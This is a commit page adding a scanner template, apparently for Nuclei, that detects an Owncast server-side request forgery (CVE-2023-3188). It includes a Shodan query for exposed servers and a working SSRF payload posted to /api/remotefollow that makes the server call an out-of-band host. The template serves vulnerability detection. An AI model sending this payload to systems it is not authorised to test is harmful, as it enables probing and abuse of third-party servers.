Create CVE-2023-3188.yaml

patch-11
Dhiyaneshwaran 2024-09-17 00:24:34 +05:30 committed by GitHub
parent d6cc030922
commit b29c0b4f98
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 50 additions and 0 deletions

View File

@ -0,0 +1,50 @@
id: CVE-2023-3188
info:
name: Owncast Server Side Request Forgery
author: DhiyaneshDk
severity: medium
description: |
Server-Side Request Forgery (SSRF) in GitHub repository owncast/owncast prior to 0.1.0.
reference:
- https://owncast.online/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2023-3188
cwe-id: CWE-918
epss-score: 0.00098
epss-percentile: 0.41558
cpe: cpe:2.3:a:owncast_project:owncast:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: owncast_project
product: owncast
shodan-query: html:"owncast"
tags: cve,cve2023,owncast,oast,ssrf
http:
- raw:
- |
POST /api/remotefollow HTTP/1.1
Host: {{Hostname}}
{"account":"a@{{interactsh-url}}"}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- "success"
- type: word
part: content_type
words:
- "application/json"